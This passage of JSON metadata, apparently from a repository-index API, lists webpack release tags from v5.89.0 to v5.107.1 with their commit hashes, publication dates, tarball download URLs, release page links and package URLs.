.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"